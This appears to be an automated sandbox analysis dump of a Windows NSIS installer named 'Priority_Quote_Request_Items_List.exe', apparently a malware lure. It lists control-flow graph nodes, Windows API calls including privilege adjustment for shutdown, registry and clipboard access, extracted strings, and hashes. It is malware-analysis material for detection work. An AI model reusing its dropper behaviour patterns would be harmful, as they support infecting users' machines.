4393->4391 4394 401dfd EnableWindow 4395 402a4c 4394->4395 4396 4014ff 4397 401507 4396->4397 4399 40151a 4396->4399 4398 402ba2 18 API calls 4397->4398 4398->4399 4400 401000 4401 401037 BeginPaint GetClientRect 4400->4401 4402 40100c DefWindowProcW 4400->4402 4404 4010f3 4401->4404 4405 401179 4402->4405 4406 401073 CreateBrushIndirect FillRect DeleteObject 4404->4406 4407 4010fc 4404->4407 4406->4404 4408 401102 CreateFontIndirectW 4407->4408 4409 401167 EndPaint 4407->4409 4408->4409 4410 401112 6 API calls 4408->4410 4409->4405 4410->4409 4418 402d04 4419 402d16 SetTimer 4418->4419 4420 402d2f 4418->4420 4419->4420 4421 402d84 4420->4421 4422 402d49 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4420->4422 4422->4421 4423 401904 4424 40193b 4423->4424 4425 402bbf 18 API calls 4424->4425 4426 401940 4425->4426 4427 40580b 69 API calls 4426->4427 4428 401949 4427->4428 3160 403c06 3161 403d59 3160->3161 3162 403c1e 3160->3162 3164 403d6a GetDlgItem GetDlgItem 3161->3164 3169 403daa 3161->3169 3162->3161 3163 403c2a 3162->3163 3165 403c35 SetWindowPos 3163->3165 3166 403c48 3163->3166 3167 4040de 19 API calls 3164->3167 3165->3166 3171 403c65 3166->3171 3172 403c4d ShowWindow 3166->3172 3173 403d94 SetClassLongW 3167->3173 3168 403e04 3174 403d54 3168->3174 3230 40412a 3168->3230 3169->3168 3178 401389 2 API calls 3169->3178 3175 403c87 3171->3175 3176 403c6d DestroyWindow 3171->3176 3172->3171 3177 40140b 2 API calls 3173->3177 3180 403c8c SetWindowLongW 3175->3180 3181 403c9d 3175->3181 3179 404067 3176->3179 3177->3169 3182 403ddc 3178->3182 3179->3174 3189 404098 ShowWindow 3179->3189 3180->3174 3185 403d46 3181->3185 3186 403ca9 GetDlgItem 3181->3186 3182->3168 3187 403de0 SendMessageW 3182->3187 3183 40140b 2 API calls 3201 403e16 3183->3201 3184 404069 DestroyWindow EndDialog 3184->3179 3249 404145 3185->3249 3190 403cd9 3186->3190 3191 403cbc SendMessageW IsWindowEnabled 3186->3191 3187->3174 3189->3174 3193 403ce6 3190->3193 3194 403d2d SendMessageW 3190->3194 3195 403cf9 3190->3195 3204 403cde 3190->3204 3191->3174 3191->3190 3192 40603c 18 API calls 3192->3201 3193->3194 3193->3204 3194->3185 3198 403d01 3195->3198 3199 403d16 3195->3199 3197 4040de 19 API calls 3197->3201 3243 40140b 3198->3243 3203 40140b 2 API calls 3199->3203 3200 403d14 3200->3185 3201->3174 3201->3183 3201->3184 3201->3192 3201->3197 3221 403fa9 DestroyWindow 3201->3221 3233 4040de 3201->3233 3205 403d1d 3203->3205 3246 4040b7 3204->3246 3205->3185 3205->3204 3207 403e91 GetDlgItem 3208 403ea6 3207->3208 3209 403eae ShowWindow KiUserCallbackDispatcher 3207->3209 3208->3209 3236 404100 KiUserCallbackDispatcher 3209->3236 3211 403ed8 EnableWindow 3214 403eec 3211->3214 3212 403ef1 GetSystemMenu EnableMenuItem SendMessageW 3213 403f21 SendMessageW 3212->3213 3212->3214 3213->3214 3214->3212 3237 404113 SendMessageW 3214->3237 3238 40601a lstrcpynW 3214->3238 3217 403f4f lstrlenW 3218 40603c 18 API calls 3217->3218 3219 403f65 SetWindowTextW 3218->3219 3239 401389 3219->3239 3221->3179 3222 403fc3 CreateDialogParamW 3221->3222 3222->3179 3223 403ff6 3222->3223 3224 4040de 19 API calls 3223->3224 3225 404001 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3224->3225 3226 401389 2 API calls 3225->3226 3227 404047 3226->3227 3227->3174 3228 40404f ShowWindow 3227->3228 3229 40412a SendMessageW 3228->3229 3229->3179 3231 404142 3230->3231 3232 404133 SendMessageW 3230->3232 3231->3201 3232->3231 3234 40603c 18 API calls 3233->3234 3235 4040e9 SetDlgItemTextW 3234->3235 3235->3207 3236->3211 3237->3214 3238->3217 3241 401390 3239->3241 3240 4013fe 3240->3201 3241->3240 3242 4013cb MulDiv SendMessageW 3241->3242 3242->3241 3244 401389 2 API calls 3243->3244 3245 401420 3244->3245 3245->3204 3247 4040c4 SendMessageW 3246->3247 3248 4040be 3246->3248 3247->3200 3248->3247 3250 40415d GetWindowLongW 3249->3250 3260 4041e6 3249->3260 3251 40416e 3250->3251 3250->3260 3252 404180 3251->3252 3253 40417d GetSysColor 3251->3253 3254 404190 SetBkMode 3252->3254 3255 404186 SetTextColor 3252->3255 3253->3252 3256 4041a8 GetSysColor 3254->3256 3257 4041ae 3254->3257 3255->3254 3256->3257 3258 4041b5 SetBkColor 3257->3258 3259 4041bf 3257->3259 3258->3259 3259->3260 3261 4041d2 DeleteObject 3259->3261 3262 4041d9 CreateBrushIndirect 3259->3262 3260->3174 3261->3262 3262->3260 4429 402786 4430 4029f7 4429->4430 4431 40278d 4429->4431 4432 402ba2 18 API calls 4431->4432 4433 402798 4432->4433 4434 40279f SetFilePointer 4433->4434 4434->4430 4435 4027af 4434->4435 4437 405f61 wsprintfW 4435->4437 4437->4430 4438 401907 4439 402bbf 18 API calls 4438->4439 4440 40190e 4439->4440 4441 40575f MessageBoxIndirectW 4440->4441 4442 401917 4441->4442 4443 401e08 4444 402bbf 18 API calls 4443->4444 4445 401e0e 4444->4445 4446 402bbf 18 API calls 4445->4446 4447 401e17 4446->4447 4448 402bbf 18 API calls 4447->4448 4449 401e20 4448->4449 4450 402bbf 18 API calls 4449->4450 4451 401e29 4450->4451 4452 401423 25 API calls 4451->4452 4453 401e30 ShellExecuteW 4452->4453 4454 401e61 4453->4454 4460 401491 4461 405179 25 API calls 4460->4461 4462 401498 4461->4462 4463 401a15 4464 402bbf 18 API calls 4463->4464 4465 401a1e ExpandEnvironmentStringsW 4464->4465 4466 401a32 4465->4466 4468 401a45 4465->4468 4467 401a37 lstrcmpW 4466->4467 4466->4468 4467->4468 4469 402515 4470 402bbf 18 API calls 4469->4470 4471 40251c 4470->4471 4474 405bef GetFileAttributesW CreateFileW 4471->4474 4473 402528 4474->4473 4475 402095 4476 402bbf 18 API calls 4475->4476 4477 40209c 4476->4477 4478 402bbf 18 API calls 4477->4478 4479 4020a6 4478->4479 4480 402bbf 18 API calls 4479->4480 4481 4020b0 4480->4481 4482 402bbf 18 API calls 4481->4482 4483 4020ba 4482->4483 4484 402bbf 18 API calls 4483->4484 4486 4020c4 4484->4486 4485 402103 CoCreateInstance 4490 402122 4485->4490 4486->4485 4487 402bbf 18 API calls 4486->4487 4487->4485 4488 401423 25 API calls 4489 4021e1 4488->4489 4490->4488 4490->4489 4491 401b16 4492 402bbf 18 API calls 4491->4492 4493 401b1d 4492->4493 4494 402ba2 18 API calls 4493->4494 4495 401b26 wsprintfW 4494->4495 4496 402a4c 4495->4496 4511 40159b 4512 402bbf 18 API calls 4511->4512 4513 4015a2 SetFileAttributesW 4512->4513 4514 4015b4 4513->4514 3836 401f1d 3837 402bbf 18 API calls 3836->3837 3838 401f24 3837->3838 3839 4063f4 5 API calls 3838->3839 3840 401f33 GetFileVersionInfoSizeW 3839->3840 3841 402a4c 3840->3841 3842 401f4f GlobalAlloc 3840->3842 3842->3841 3843 401f63 3842->3843 3844 4063f4 5 API calls 3843->3844 3845 401f6a 3844->3845 3846 4063f4 5 API calls 3845->3846 3848 401f74 3846->3848 3847 401fb7 3847->3841 3848->3847 3852 405f61 wsprintfW 3848->3852 3850 401fa9 3853 405f61 wsprintfW 3850->3853 3852->3850 3853->3847 4515 40229d 4516 4022a5 4515->4516 4517 4022ab 4515->4517 4518 402bbf 18 API calls 4516->4518 4519 4022b9 4517->4519 4521 402bbf 18 API calls 4517->4521 4518->4517 4520 4022c7 4519->4520 4522 402bbf 18 API calls 4519->4522 4523 402bbf 18 API calls 4520->4523 4521->4519 4522->4520 4524 4022d0 WritePrivateProfileStringW 4523->4524 3854 40249e 3865 402cc9 3854->3865 3856 4024a8 3857 402ba2 18 API calls 3856->3857 3858 4024b1 3857->3858 3859 4024bc 3858->3859 3863 40281e 3858->3863 3860 4024d5 RegEnumValueW 3859->3860 3861 4024c9 RegEnumKeyW 3859->3861 3862 4024ee RegCloseKey 3860->3862 3860->3863 3861->3862 3862->3863 3866 402bbf 18 API calls 3865->3866 3867 402ce2 3866->3867 3868 402cf0 RegOpenKeyExW 3867->3868 3868->3856 4525 40149e 4526 402288 4525->4526 4527 4014ac PostQuitMessage 4525->4527 4527->4526 3869 40231f 3870 402324 3869->3870 3871 40234f 3869->3871 3873 402cc9 19 API calls 3870->3873 3872 402bbf 18 API calls 3871->3872 3874 402356 3872->3874 3875 40232b 3873->3875 3882 402bff RegOpenKeyExW 3874->3882 3876 402335 3875->3876 3880 40236e 3875->3880 3877 402bbf 18 API calls 3876->3877 3878 40233c RegDeleteValueW RegCloseKey 3877->3878 3878->3880 3888 402c2a 3882->3888 3889 40236c 3882->3889 3883 402c50 RegEnumKeyW 3884 402c62 RegCloseKey 3883->3884 3883->3888 3886 4063f4 5 API calls 3884->3886 3885 402c87 RegCloseKey 3885->3889 3890 402c72 3886->3890 3887 402bff 5 API calls 3887->3888 3888->3883 3888->3884 3888->3885 3888->3887 3889->3880 3890->3889 3891 402ca2 RegDeleteKeyW 3890->3891 3891->3889 4535 403821 4536 40382c 4535->4536 4537 403830 4536->4537 4538 403833 GlobalAlloc 4536->4538 4538->4537 4539 401ca3 4540 402ba2 18 API calls 4539->4540 4541 401ca9 IsWindow 4540->4541 4542 401a05 4541->4542 4543 402a27 SendMessageW 4544 402a41 InvalidateRect 4543->4544 4545 402a4c 4543->4545 4544->4545 4546 40242a 4547 402cc9 19 API calls 4546->4547 4548 402434 4547->4548 4549 402bbf 18 API calls 4548->4549 4550 40243d 4549->4550 4551 402448 RegQueryValueExW 4550->4551 4554 40281e 4550->4554 4552 40246e RegCloseKey 4551->4552 4553 402468 4551->4553 4552->4554 4553->4552 4557 405f61 wsprintfW 4553->4557 4557->4552 4558 40422c lstrlenW 4559 40424b 4558->4559 4560 40424d WideCharToMultiByte 4558->4560 4559->4560 4561 40172d 4562 402bbf 18 API calls 4561->4562 4563 401734 SearchPathW 4562->4563 4564 40174f 4563->4564 4572 404532 4573 404542 4572->4573 4574 404568 4572->4574 4575 4040de 19 API calls 4573->4575 4576 404145 8 API calls 4574->4576 4577 40454f SetDlgItemTextW 4575->4577 4578 404574 4576->4578 4577->4574 4579 4027b4 4580 4027ba 4579->4580 4581 4027c2 FindClose 4580->4581 4582 402a4c 4580->4582 4581->4582 3353 401b37 3354 401b88 3353->3354 3356 401b44 3353->3356 3357 401bb2 GlobalAlloc 3354->3357 3358 401b8d 3354->3358 3355 401bcd 3359 40603c 18 API calls 3355->3359 3366 402288 3355->3366 3356->3355 3363 401b5b 3356->3363 3360 40603c 18 API calls 3357->3360 3358->3366 3374 40601a lstrcpynW 3358->3374 3362 402282 3359->3362 3360->3355 3368 40575f MessageBoxIndirectW 3362->3368 3372 40601a lstrcpynW 3363->3372 3364 401b9f GlobalFree 3364->3366 3367 401b6a 3373 40601a lstrcpynW 3367->3373 3368->3366 3370 401b79 3375 40601a lstrcpynW 3370->3375 3372->3367 3373->3370 3374->3364 3375->3366 4583 402537 4584 402562 4583->4584 4585 40254b 4583->4585 4587 402596 4584->4587 4588 402567 4584->4588 4586 402ba2 18 API calls 4585->4586 4595 402552 4586->4595 4590 402bbf 18 API calls 4587->4590 4589 402bbf 18 API calls 4588->4589 4591 40256e WideCharToMultiByte lstrlenA 4589->4591 4592 40259d lstrlenW 4590->4592 4591->4595 4592->4595 4593 4025e0 4594 4025ca 4594->4593 4596 405ca1 WriteFile 4594->4596 4595->4593 4595->4594 4597 405cd0 5 API calls 4595->4597 4596->4593 4597->4594 3376 4052b8 3377 405462 3376->3377 3378 4052d9 GetDlgItem GetDlgItem GetDlgItem 3376->3378 3380 40546b GetDlgItem CreateThread CloseHandle 3377->3380 3382 405493 3377->3382 3421 404113 SendMessageW 3378->3421 3380->3382 3424 40524c OleInitialize 3380->3424 3381 405349 3387 405350 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3381->3387 3383 4054be 3382->3383 3384 4054e3 3382->3384 3385 4054aa ShowWindow ShowWindow 3382->3385 3386 40551e 3383->3386 3389 4054d2 3383->3389 3390 4054f8 ShowWindow 3383->3390 3391 404145 8 API calls 3384->3391 3423 404113 SendMessageW 3385->3423 3386->3384 3396 40552c SendMessageW 3386->3396 3394 4053a2 SendMessageW SendMessageW 3387->3394 3395 4053be 3387->3395 3397 4040b7 SendMessageW 3389->3397 3392 405518 3390->3392 3393 40550a 3390->3393 3398 4054f1 3391->3398 3400 4040b7 SendMessageW 3392->3400 3399 405179 25 API calls 3393->3399 3394->3395 3401 4053d1 3395->3401 3402 4053c3 SendMessageW 3395->3402 3396->3398 3403 405545 CreatePopupMenu 3396->3403 3397->3384 3399->3392 3400->3386 3405 4040de 19 API calls 3401->3405 3402->3401 3404 40603c 18 API calls 3403->3404 3406 405555 AppendMenuW 3404->3406 3407 4053e1 3405->3407 3408 405572 GetWindowRect 3406->3408 3409 405585 TrackPopupMenu 3406->3409 3410 4053ea ShowWindow 3407->3410 3411 40541e GetDlgItem SendMessageW 3407->3411 3408->3409 3409->3398 3413 4055a0 3409->3413 3414 405400 ShowWindow 3410->3414 3415 40540d 3410->3415 3411->3398 3412 405445 SendMessageW SendMessageW 3411->3412 3412->3398 3416 4055bc SendMessageW 3413->3416 3414->3415 3422 404113 SendMessageW 3415->3422 3416->3416 3417 4055d9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3416->3417 3419 4055fe SendMessageW 3417->3419 3419->3419 3420 405627 GlobalUnlock SetClipboardData CloseClipboard 3419->3420 3420->3398 3421->3381 3422->3411 3423->3383 3425 40412a SendMessageW 3424->3425 3426 40526f 3425->3426 3429 401389 2 API calls 3426->3429 3430 405296 3426->3430 3427 40412a SendMessageW 3428 4052a8 CoUninitialize 3427->3428 3429->3426 3430->3427 4598 4014b8 4599 4014be 4598->4599 4600 401389 2 API calls 4599->4600 4601 4014c6 4600->4601 3431 4015b9 3432 402bbf 18 API calls 3431->3432 3433 4015c0 3432->3433 3451 405a79 CharNextW CharNextW 3433->3451 3435 401629 3437 40165b 3435->3437 3438 40162e 3435->3438 3436 4059fb CharNextW 3446 4015c9 3436->3446 3441 401423 25 API calls 3437->3441 3457 401423 3438->3457 3447 401653 3441->3447 3445 401642 SetCurrentDirectoryW 3445->3447 3446->3435 3446->3436 3448 4015f2 3446->3448 3449 40160f GetFileAttributesW 3446->3449 3461 4056e2 3446->3461 3469 4056c5 CreateDirectoryW 3446->3469 3448->3446 3464 405648 CreateDirectoryW 3448->3464 3449->3446 3452 405a96 3451->3452 3456 405aa8 3451->3456 3454 405aa3 CharNextW 3452->3454 3452->3456 3453 405acc 3453->3446 3454->3453 3455 4059fb CharNextW 3455->3456 3456->3453 3456->3455 3458 405179 25 API calls 3457->3458 3459 401431 3458->3459 3460 40601a lstrcpynW 3459->3460 3460->3445 3472 4063f4 GetModuleHandleA 3461->3472 3465 405695 3464->3465 3466 405699 GetLastError 3464->3466 3465->3448 3466->3465 3467 4056a8 SetFileSecurityW 3466->3467 3467->3465 3468 4056be GetLastError 3467->3468 3468->3465 3470 4056d5 3469->3470 3471 4056d9 GetLastError 3469->3471 3470->3446 3471->3470 3473 406410 3472->3473 3474 40641a GetProcAddress 3472->3474 3478 406384 GetSystemDirectoryW 3473->3478 3476 4056e9 3474->3476 3476->3446 3477 406416 3477->3474 3477->3476 3480 4063a6 wsprintfW LoadLibraryExW 3478->3480 3480->3477 4608 40293b 4609 402ba2 18 API calls 4608->4609 4610 402941 4609->4610 4611 402964 4610->4611 4612 40297d 4610->4612 4618 40281e 4610->4618 4615 402969 4611->4615 4616 40297a 4611->4616 4613 402993 4612->4613 4614 402987 4612->4614 4619 40603c 18 API calls 4613->4619 4617 402ba2 18 API calls 4614->4617 4622 40601a lstrcpynW 4615->4622 4623 405f61 wsprintfW 4616->4623 4617->4618 4619->4618 4622->4618 4623->4618

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 40326a-40329d SetErrorMode GetVersion 1 4032b0 0->1 2 40329f-4032a7 call 4063f4 0->2 4 4032b5-4032c9 call 406384 lstrlenA 1->4 2->1 7 4032a9 2->7 9 4032cb-40333f call 4063f4 * 2 #17 OleInitialize SHGetFileInfoW call 40601a GetCommandLineW call 40601a GetModuleHandleW 4->9 7->1 18 403341-403348 9->18 19 403349-403363 call 4059fb CharNextW 9->19 18->19 22 403369-40336f 19->22 23 40347a-403494 GetTempPathW call 403239 19->23 25 403371-403376 22->25 26 403378-40337c 22->26 30 403496-4034b4 GetWindowsDirectoryW lstrcatW call 403239 23->30 31 4034ec-403506 DeleteFileW call 402dee 23->31 25->25 25->26 28 403383-403387 26->28 29 40337e-403382 26->29 32 403446-403453 call 4059fb 28->32 33 40338d-403393 28->33 29->28 30->31 48 4034b6-4034e6 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403239 30->48 51 4035b7-4035c7 call 403789 OleUninitialize 31->51 52 40350c-403512 31->52 49 403455-403456 32->49 50 403457-40345d 32->50 37 403395-40339d 33->37 38 4033ae-4033e7 33->38 44 4033a4 37->44 45 40339f-4033a2 37->45 39 403404-40343e 38->39 40 4033e9-4033ee 38->40 39->32 47 403440-403444 39->47 40->39 46 4033f0-4033f8 40->46 44->38 45->38 45->44 54 4033fa-4033fd 46->54 55 4033ff 46->55 47->32 56 403465-403473 call 40601a 47->56 48->31 48->51 49->50 50->22 58 403463 50->58 67 4036ed-4036f3 51->67 68 4035cd-4035dd call 40575f ExitProcess 51->68 59 4035a7-4035ae call 403863 52->59 60 403518-403523 call 4059fb 52->60 54->39 54->55 55->39 63 403478 56->63 58->63 70 4035b3 59->70 74 403571-40357b 60->74 75 403525-40355a 60->75 63->23 72 403771-403779 67->72 73 4036f5-40370b GetCurrentProcess OpenProcessToken 67->73 70->51 77 40377b 72->77 78 40377f-403783 ExitProcess 72->78 82 403741-40374f call 4063f4 73->82 83 40370d-40373b LookupPrivilegeValueW AdjustTokenPrivileges 73->83 80 4035e3-4035f7 call 4056e2 lstrcatW 74->80 81 40357d-40358b call 405ad6 74->81 76 40355c-403560 75->76 84 403562-403567 76->84 85 403569-40356d 76->85 77->78 94 403604-40361e lstrcatW lstrcmpiW 80->94 95 4035f9-4035ff lstrcatW 80->95 81->51 93 40358d-4035a3 call 40601a * 2 81->93 96 403751-40375b 82->96 97 40375d-403768 ExitWindowsEx 82->97 83->82 84->85 89 40356f 84->89 85->76 85->89 89->74 93->59 94->51 100 403620-403623 94->100 95->94 96->97 98 40376a-40376c call 40140b 96->98 97->72 97->98 98->72 103 403625-40362a call 405648 100->103 104 40362c call 4056c5 100->104 109 403631-40363f SetCurrentDirectoryW 103->109 104->109 112 403641-403647 call 40601a 109->112 113 40364c-403675 call 40601a 109->113 112->113 117 40367a-403696 call 40603c DeleteFileW 113->117 120 4036d7-4036df 117->120 121 403698-4036a8 CopyFileW 117->121 120->117 122 4036e1-4036e8 call 405ebb 120->122 121->120 123 4036aa-4036ca call 405ebb call 40603c call 4056fa 121->123 122->51 123->120 132 4036cc-4036d3 CloseHandle 123->132 132->120
                                                      APIs
                                                      • SetErrorMode.KERNELBASE ref: 0040328D
                                                      • GetVersion.KERNEL32 ref: 00403293
                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004032BC
                                                      • #17.COMCTL32(00000007,00000009), ref: 004032DF
                                                      • OleInitialize.OLE32(00000000), ref: 004032E6
                                                      • SHGetFileInfoW.SHELL32(004206A8,00000000,?,000002B4,00000000), ref: 00403302
                                                      • GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 00403317
                                                      • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe",00000000), ref: 0040332A
                                                      • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe",00000020), ref: 00403351
                                                        • Part of subcall function 004063F4: GetModuleHandleA.KERNEL32(?,00000020,?,004032D3,00000009), ref: 00406406
                                                        • Part of subcall function 004063F4: GetProcAddress.KERNEL32(00000000,?), ref: 00406421
                                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 0040348B
                                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040349C
                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034A8
                                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034BC
                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034C4
                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004034D5
                                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004034DD
                                                      • DeleteFileW.KERNELBASE(1033), ref: 004034F1
                                                        • Part of subcall function 0040601A: lstrcpynW.KERNEL32(?,?,00000400,00403317,00428200,NSIS Error), ref: 00406027
                                                      • OleUninitialize.OLE32(?), ref: 004035BC
                                                      • ExitProcess.KERNEL32 ref: 004035DD
                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe",00000000,?), ref: 004035F0
                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040926C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe",00000000,?), ref: 004035FF
                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe",00000000,?), ref: 0040360A
                                                      • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe",00000000,?), ref: 00403616
                                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403632
                                                      • DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 0040368C
                                                      • CopyFileW.KERNEL32(00437800,0041FEA8,00000001), ref: 004036A0
                                                      • CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 004036CD
                                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 004036FC
                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00403703
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403718
                                                      • AdjustTokenPrivileges.ADVAPI32 ref: 0040373B
                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 00403760
                                                      • ExitProcess.KERNEL32 ref: 00403783
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                      • String ID: "C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\thrombopenia$C:\Users\user\AppData\Roaming\thrombopenia\Clothesbag25$C:\Users\user\Desktop$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                      • API String ID: 2488574733-1821892610
                                                      • Opcode ID: 2420fe7769d26c598cc17e9bd0fdec494bf06985fe1d6394dd0eae93972a8dec
                                                      • Instruction ID: 73295983c26b9bc795aacbdf710e3d5853a553e8a558082b103844ae68e0e3ab
                                                      • Opcode Fuzzy Hash: 2420fe7769d26c598cc17e9bd0fdec494bf06985fe1d6394dd0eae93972a8dec
                                                      • Instruction Fuzzy Hash: C3D1F470644200BBD720BF659D45A3B3AACEB8074AF10487EF541B62D2DB7D9D42CB6E

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 133 4052b8-4052d3 134 405462-405469 133->134 135 4052d9-4053a0 GetDlgItem * 3 call 404113 call 404a16 GetClientRect GetSystemMetrics SendMessageW * 2 133->135 137 405493-4054a0 134->137 138 40546b-40548d GetDlgItem CreateThread CloseHandle 134->138 155 4053a2-4053bc SendMessageW * 2 135->155 156 4053be-4053c1 135->156 140 4054a2-4054a8 137->140 141 4054be-4054c8 137->141 138->137 143 4054e3-4054ec call 404145 140->143 144 4054aa-4054b9 ShowWindow * 2 call 404113 140->144 145 4054ca-4054d0 141->145 146 40551e-405522 141->146 159 4054f1-4054f5 143->159 144->141 150 4054d2-4054de call 4040b7 145->150 151 4054f8-405508 ShowWindow 145->151 146->143 148 405524-40552a 146->148 148->143 157 40552c-40553f SendMessageW 148->157 150->143 153 405518-405519 call 4040b7 151->153 154 40550a-405513 call 405179 151->154 153->146 154->153 155->156 162 4053d1-4053e8 call 4040de 156->162 163 4053c3-4053cf SendMessageW 156->163 164 405641-405643 157->164 165 405545-405570 CreatePopupMenu call 40603c AppendMenuW 157->165 172 4053ea-4053fe ShowWindow 162->172 173 40541e-40543f GetDlgItem SendMessageW 162->173 163->162 164->159 170 405572-405582 GetWindowRect 165->170 171 405585-40559a TrackPopupMenu 165->171 170->171 171->164 175 4055a0-4055b7 171->175 176 405400-40540b ShowWindow 172->176 177 40540d 172->177 173->164 174 405445-40545d SendMessageW * 2 173->174 174->164 178 4055bc-4055d7 SendMessageW 175->178 179 405413-405419 call 404113 176->179 177->179 178->178 180 4055d9-4055fc OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 178->180 179->173 182 4055fe-405625 SendMessageW 180->182 182->182 183 405627-40563b GlobalUnlock SetClipboardData CloseClipboard 182->183 183->164
                                                      APIs
                                                      • GetDlgItem.USER32(?,00000403), ref: 00405316
                                                      • GetDlgItem.USER32(?,000003EE), ref: 00405325
                                                      • GetClientRect.USER32(?,?), ref: 00405362
                                                      • GetSystemMetrics.USER32(00000002), ref: 00405369
                                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 0040538A
                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040539B
                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053AE
                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053BC
                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053CF
                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004053F1
                                                      • ShowWindow.USER32(?,00000008), ref: 00405405
                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405426
                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405436
                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040544F
                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040545B
                                                      • GetDlgItem.USER32(?,000003F8), ref: 00405334
                                                        • Part of subcall function 00404113: SendMessageW.USER32(00000028,?,00000001,00403F3F), ref: 00404121
                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405478
                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_0000524C,00000000), ref: 00405486
                                                      • CloseHandle.KERNELBASE(00000000), ref: 0040548D
                                                      • ShowWindow.USER32(00000000), ref: 004054B1
                                                      • ShowWindow.USER32(?,00000008), ref: 004054B6
                                                      • ShowWindow.USER32(00000008), ref: 00405500
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405534
                                                      • CreatePopupMenu.USER32 ref: 00405545
                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405559
                                                      • GetWindowRect.USER32(?,?), ref: 00405579
                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405592
